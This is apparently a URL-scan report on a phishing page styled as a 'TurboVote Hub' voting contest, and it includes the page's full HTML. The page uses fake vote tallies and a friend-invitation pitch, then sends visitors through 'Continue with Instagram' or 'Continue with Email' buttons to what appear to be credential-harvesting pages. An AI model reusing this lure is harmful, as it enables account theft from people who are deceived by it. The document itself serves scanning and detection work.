http://turbovotehub.000.pe/en/11

Submitted URL:
http://turbovotehub.000.pe/enRedirected
Report Finished:

The outgoing links identified from the page

JavaScript Variables · 8 found

Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope

NameType
onbeforetoggleobject
onscrollendobject
loaderobject
instaobject
gmaiobject
buttonobject
button2object
votionobject

Console log messages · 1 found

Messages logged to the web console

TypeCategoryLog
errornetwork
URL
https://errors.infinityfree.net/errors/404/
Text
Failed to load resource: the server responded with a status of 404 ()

HTML

The raw HTML body of the page

<!-- <script>
    // Get today's date
    var today = new Date();
    // Set the target date (e.g., May 31, 2024)
    var targetDate = new Date('2024-05-18');

    // Check if today's date is greater than the target date
    if (today > targetDate) {
        // Redirect to another page
        window.location.href = 'https://hostblast.net/cgi-sys/suspendedpage.cgi';
    }
</script> --><!-- <div id="google_translate_element" style='position: fixed; bottom: 0; left: 0'></div>
  <script type="text/javascript">
        function googleTranslateElementInit() {
            new google.translate.TranslateElement({pageLanguage: 'en', layout: google.translate.TranslateElement.InlineLayout.SIMPLE}, 'google_translate_element');
        }
    </script>

    <script type="text/javascript" src="https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script> --><!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <meta name="robots" content="noindex">

    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        body {
            background: linear-gradient(#a8e8fa, #ffffff96),url(./images/vote_trans.png);
            background-position: center;
            background-attachment: fixed;
            background-size: cover;
            color: #353434;
            font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
            padding: 10px;
        }
        .votion #profile {
            text-align: center;
            border-radius: 100%;
            width: 200px;
            height: 200px;
            /* border: 1px solid dodgerblue; */
        }
        .votion h1 {
            font-weight: bolder;
            font-size: 30px;
            text-align: center;
            margin: 50px 0 20px 0;
        }
        .text-content p:nth-child(1){
            font-size: 23px;
            font-weight: bolder;
            text-align: center;
            margin: 30px 0 20px 0;
        } 
        .text-content p:nth-child(2) {
            text-align: center;
            font-size: 15px;
            margin: 10px 0;
            padding: 10px 30px;
            line-height: 30px;
        }
        .text-content button {
            background: #594ED7;
            border: 1px solid transparent;
            outline: 1px solid transparent;
            color: white;
            font-weight: bold;
            text-align: center;
            padding: 15px 10px;
            margin: 10px 0;
            font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
            border-radius: 3px;
            width: 95%;
        }

        .text-content .button2 {
            background: #D9534F !important;
            border: 1px solid transparent;
            outline: 1px solid transparent;
            color: white;
            font-weight: bold;
            text-align: center;
            padding: 15px 10px;
            margin: 10px 0;
            font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
            border-radius: 3px;
            width: 95%;
        }


        .grid-count-text, .grid-count-number {
            display: grid;
            grid-template-columns: 1fr 1fr;
            text-align: center;
            margin: 10px 0;
        }
        .grid-count-text article {
            font-size: 20px;
            font-weight: bold;
        }
        .grid-count-number article {
            font-size: 30px;
            font-weight: bold;
            background: #ffffffa8;
            margin: 5px 30px;
            border-radius: 5px;
            width: 80%;
            padding: 10px;
        }
        #rem {
            font-size: 20px;
            font-weight: bold;
            text-align: center;
        }
        #sum {
            font-size: 30px;
            font-weight: bold;
            background: #ffffffa8;
            margin: 5px 50%;
            transform: translateX(-50%);
            text-align: center;
            border-radius: 5px;
            width: 30%;
            padding: 10px;
        }
        #bird {
            position: absolute;
            transform: translateX(-10px);
            width: 180px;
        }
        #bird2 {
            position: absolute;
            right: 0px;
            transform: rotateY(160deg);
            width: 180px;
        }
        .loader {
            background: white;
            position: fixed;
            top: 0;
            height: 100%;
            z-index: 99999;
            width: 100%;
            left: 0;
            display: flex;
            justify-content: center;
            flex-direction: column;
            align-items: center;
        }
        .insta, .gmai {
            display: none;
            background: white;
            position: fixed;
            top: 0;
            height: 100%;
            z-index: 99999;
            width: 100%;
            left: 0;
            display: flex;
            visibility: hidden;
            justify-content: center;
            flex-direction: column;
            align-items: center;
        }
        .gmai {
            background: #F5F4F2 !important;
        }
        .insta-toggle {
            visibility: visible;
        }
        @media screen and (min-width: 768px) {
            .fixed {
                width: 50%;
                margin: 0 50%;
                transform: translateX(-50%);
            }
        }

    </style>
</head>
<body>

<div class="loader">
    <img src="./images/loader.gif" width="300px">
</div>

<div class="insta">
    <img src="./images/instagram_dribbble.gif" width="300px">
</div>

<div class="gmai">
    <img src="./images/gma.gif" width="300px">
</div>

<div class="fixed">
<div class="votion">
    <!-- <h1>Votion</h1> --> <br><br>
    <img src="./images/output-onlinegiftools.gif" id="bird">
    <img src="./images/output-onlinegiftools.gif" id="bird2">
    <center><img id="profile" src="./images/IMG_0756.png"></center>
    <div class="text-content">
        <p>TurboVote Hub invited you</p>
        <p>Your friend thinks you're amazing and wants your help getting elected.</p>
        <!-- <p>Your friend wants your help getting elected as the new ambassador.</p> -->
        <div class="grid-count-text">
            <article>Max Vote</article>

            <article>Voted</article>
        </div>

        <div class="grid-count-number">
            <article>5688</article>

            <article>5678</article>
        </div>

        
        <article id="rem">Remaining</article>
        <article id="sum">10</article>

        <center><button class="button">Continue with Instagram</button></center>
        <center><button class="button2">Continue with Email</button></center>

        <br>

        <h4 style="text-align: center; color: #3f3f3f;">Powered by <span style="color: #5B9BD1;"> google voting system</span></h4>

    </div>
</div>
</div>

<script>
    var loader = document.querySelector('.loader')
    var insta = document.querySelector('.insta')
    var gmai = document.querySelector('.gmai')
    var button = document.querySelector('.button')
    var button2 = document.querySelector('.button2')
    var votion = document.querySelector('.votion')

    setTimeout(() => {
        loader.style.display = 'none'
    }, 5000);

    button.addEventListener('click', function () {
        votion.style.display = 'none'
        insta.classList.add("insta-toggle")
        setTimeout(() => {
            window.location.href = '1'
        }, 6000);
    })


    button2.addEventListener('click', function () {
        votion.style.display = 'none'
        gmai.classList.add("insta-toggle")
        setTimeout(() => {
            window.location.href = '2'
        }, 6000);
    })


</script>

</body></html>